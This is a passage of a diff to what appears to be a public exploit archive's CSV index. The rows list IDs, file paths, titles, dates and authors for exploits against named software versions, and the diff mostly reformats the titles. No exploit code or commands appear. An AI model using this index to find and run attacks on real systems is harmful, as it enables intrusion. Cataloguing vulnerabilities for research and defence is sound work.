Vulnerability",2010-01-17,"Alejandro Ramos",hardware,remote,0 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 'servercert' Parameter Cross Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0 @@ -30247,8 +30247,8 @@ id,file,description,date,author,platform,type,port 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 'tid' Parameter Cross Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0 -33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x Multiple Cross Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 -33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0 +33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 +33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0 33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow Vulnerability",2010-01-29,"Evgeny Legerov",multiple,dos,0 33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross Site Scripting Vulnerability",2010-01-29,Yoyahack,hardware,remote,0 33581,platforms/linux/dos/33581.txt,"Hybserv2 ':help' Command Denial Of Service Vulnerability",2010-01-29,"Julien Cristau",linux,dos,0 @@ -30265,20 +30265,20 @@ id,file,description,date,author,platform,type,port 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0 33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0 -33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager 5.1.3 and Prior Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 -33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 +33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 +33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0 33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability",2010-02-04,kingcope,linux,remote,0 33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability (2)",2010-02-04,kingcope,linux,remote,0 33600,platforms/multiple/remote/33600.rb,"Oracle 10g Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33601,platforms/multiple/remote/33601.rb,"Oracle 11g Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 -33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0 -33603,platforms/php/webapps/33603.html,"LANDesk Management Gateway 4.x Multiple Security Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps,0 +33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0 +33603,platforms/php/webapps/33603.html,"LANDesk Management Gateway 4.x - Multiple Security Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps,0 33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 '__get_argv()' and '__get_compat_argv()' Local Memory Corruption Vulnerabilities",2010-02-05,"Josh Stone",linux,local,0 33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS 'i' Parameter Local File Include Vulnerability",2010-02-05,Wireghoul,php,webapps,0 33606,platforms/php/webapps/33606.txt,"ASCET Interactive Huski Retail Multiple SQL Injection Vulnerabilities",2010-02-05,Wireghoul,php,webapps,0 -33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",multiple,dos,0 -33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0 +33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",multiple,dos,0 +33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0 33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 @@ -30286,13 +30286,13 @@ id,file,description,date,author,platform,type,port 33615,platforms/multiple/remote/33615.txt,"JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability",2010-02-08,apoc,multiple,remote,0 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 Space String Remote File Disclosure Vulnerability",2010-02-08,"Pouya Daneshmand",multiple,remote,0 33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 'index.php' SQL Injection Vulnerability",2010-02-08,alnjm33,php,webapps,0 -33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0 +33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 - Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0 33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 'login.php' Cross Site Scripting Vulnerability",2010-02-08,vr,php,webapps,0 33620,platforms/linux/remote/33620.txt,"Helix Player <= 11.0.2 Encoded URI Processing Buffer Overflow Vulnerability",2007-07-03,gwright,linux,remote,0 33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component 'viewpage.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0 33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 -33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 +33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 - Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80 33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 @@ -30303,7 +30303,7 @@ id,file,description,date,author,platform,type,port 33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0 33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 -33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 +33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0 33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0 @@ -30315,12 +30315,12 @@ id,file,description,date,author,platform,type,port 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross Site Scripting Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 33645,platforms/windows/remote/33645.py,"httpdx 1.5 'MKD' Command Directory Traversal Vulnerability",2010-02-15,fb1h2s,windows,remote,0 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 -33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 Multiple Cross Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 -33648,platforms/hardware/remote/33648.txt,"Huawei HG510 Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 +33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 +33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS 'search' Parameter Cross Site Scripting Vulnerability",2010-02-16,hacker@sr.gov.yu,php,webapps,0 33650,platforms/php/webapps/33650.txt,"Extreme Mobster 'login' Parameter Cross Site Scripting Vulnerability",2010-02-16,indoushka,php,webapps,0 33651,platforms/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 Cross Site Scripting Vulnerability",2010-02-16,sarabande,php,webapps,0 -33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 Multiple Local File Include and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 +33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Include and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 'reloadFrame' Parameter Cross Site Scripting Vulnerability",2010-02-18,"George Christopoulos",multiple,remote,0 33654,platforms/php/webapps/33654.py,"Madness Pro <= 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0 33655,platforms/php/webapps/33655.py,"Madness Pro <= 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0 @@ -30328,29 +30328,29 @@ id,file,description,date,author,platform,type,port 33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting Vulnerability",2010-02-18,thebluegenius,php,webapps,0 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 'index.php' Cross Site Scripting Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0 33659,platforms/php/webapps/33659.txt,"Joomla! 'com_recipe' Component Multiple SQL Injection Vulnerabilities",2010-02-20,FL0RiX,php,webapps,0 -33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 +33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i lang Parameter Cross Site Scripting Vulnerability",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0 -33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 +33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0 -33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 +33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0 33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0 33677,platforms/php/dos/33677.txt,"PHP <= 5.3.1 - LCG Entropy Security Vulnerability",2010-02-26,Rasmus,php,dos,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0 -33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0 +33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 'loyalty_enu/start.swe' Cross Site Scripting Vulnerability",2010-03-01,Lament,multiple,remote,0 33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include Vulnerability",2010-03-01,"pratul agrawal",php,webapps,0 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 'girisyap.php' SQL Injection Vulnerability",2010-03-01,"cr4wl3r ",php,webapps,0 33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0 33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0 -33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 +33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 'uid' Parameter Cross Site Scripting Vulnerability",2010-03-02,"lis cker",php,webapps,0 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0 @@ -30361,9 +30361,9 @@ id,file,description,date,author,platform,type,port 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 -33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 +33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0 -33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 +33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0 33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' File Remote Heap Buffer Overflow Vulnerability",2010-03-04,"Gjoko Krstic",windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' File Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,dos,0 @@ -30377,11 +30377,11 @@ id,file,description,date,author,platform,type,port 33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/VISTA '.ani' File 'tagBITMAPINFOHEADER' Denial of Service Vulnerability",2010-03-08,Skylined,windows,dos,0 33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal 'search_result.asp' SQL Injection Vulnerability",2010-03-08,NoGe,asp,webapps,0 33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX <= 4.2 'post.aspx' Cross-Site Scripting Vulnerability",2010-03-08,Liscker,asp,webapps,0 -33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 'default.asp' Multiple Cross Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 +33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 33723,platforms/php/webapps/33723.html,"KDPics 1.18 'admin/index.php' Authentication Bypass Vulnerability",2010-03-08,snakespc,php,webapps,0 33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 'page' Parameter SQL Injection Vulnerability",2010-03-07,"Andrés Gómez",php,webapps,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 -33726,platforms/php/webapps/33726.txt,"TikiWiki Versions Prior to 4.2 Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 +33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 Insecure Cookie Authentication Bypass Vulnerability",2010-02-16,indoushka,php,webapps,0 33728,platforms/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam 'LoginPage.aspx' Cross Site Scripting Vulnerability",2010-03-09,Lament,asp,webapps,0 33729,platforms/multiple/dos/33729.txt,"PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service Vulnerability",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 @@ -30426,12 +30426,12 @@ id,file,description,date,author,platform,type,port 33774,platforms/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 'names.nsf' Open Redirection Vulnerability",2010-03-19,Lament,multiple,remote,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard '.yuv' File Stack Buffer Overflow Vulnerability",2010-03-19,ITSecTeam,windows,dos,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 'detail.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-18,d3v1l,php,webapps,0 -33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 Multiple Cross Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 +33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service Vulnerability",2010-03-20,Rick2600,windows,dos,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM 'ucschcancelproc.jsp' Open Redirection Vulnerability",2010-03-22,Lament,jsp,webapps,0 -33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x 'names.nsf' Cross Site Scripting Vulnerability",2010-03-19,Lament,multiple,remote,0 +33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross Site Scripting Vulnerability",2010-03-19,Lament,multiple,remote,0 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla <= 1.1.10 'definitions.php' Multiple Remote File Include Vulnerabilities",2010-03-23,eidelweiss,php,webapps,0 -33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x 'b-day.php' Addon SQL Injection Vulnerability",2010-03-22,n3w7u,php,webapps,0 +33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection Vulnerability",2010-03-22,n3w7u,php,webapps,0 33783,platforms/linux/remote/33783.txt,"Astaro Security Linux 5 'index.fpl' Cross-Site Scripting Vulnerability",2010-03-23,"Vincent Hautot",linux,remote,0 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 Search Cross Site Scripting Vulnerability",2010-03-19,5ubzer0,php,webapps,0 33785,platforms/jsp/webapps/33785.txt,"agXchange ESM 'ucquerydetails.jsp' Cross Site Scripting Vulnerability",2010-03-23,Lament,jsp,webapps,0 @@ -30467,22 +30467,22 @@ id,file,description,date,author,platform,type,port 33816,platforms/multiple/remote/33816.pl,"Miranda IM <= 0.8.16 Information Disclosure Vulnerability",2010-04-06,"Jan Schejbal",multiple,remote,0 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 -33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 +33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0 33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0 33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross Site Scripting Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 -33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 +33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting Vulnerability",2010-04-07,indoushka,php,webapps,0 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor PNG File Buffer Overflow Vulnerability",2010-04-09,eidelweiss,windows,remote,0 33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability",2014-06-21,LiquidWorm,php,webapps,0 -33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 -33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 +33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 +33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0 -33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 +33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 -33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 +33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 @@ -30491,13 +30491,13 @@ id,file,description,date,author,platform,type,port 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0 -33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0-day)",2014-06-24,@u0x,php,webapps,0 +33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 